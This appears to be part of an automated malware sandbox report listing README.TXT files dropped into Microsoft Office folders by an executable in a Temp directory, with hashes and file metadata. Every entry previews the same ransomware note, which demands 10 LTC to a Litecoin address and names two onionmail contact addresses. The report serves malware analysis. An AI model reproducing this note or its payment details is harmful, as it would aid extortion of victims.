                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000141\_office_iss_canvas_contextual\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000142\_ms_office_sdx_start_common\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000142\_ms_office_sdx_start_onenote_ui\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000142\_office_iss_canvas_contextual\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000144\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000145\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\fa000000124\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\fa000000129\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Stationery\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Templates\1033\Access\DataType\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Templates\1033\Access\Part\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Templates\1033\ONENOTE\16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Templates\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\loc\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\rsodWoW6432\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
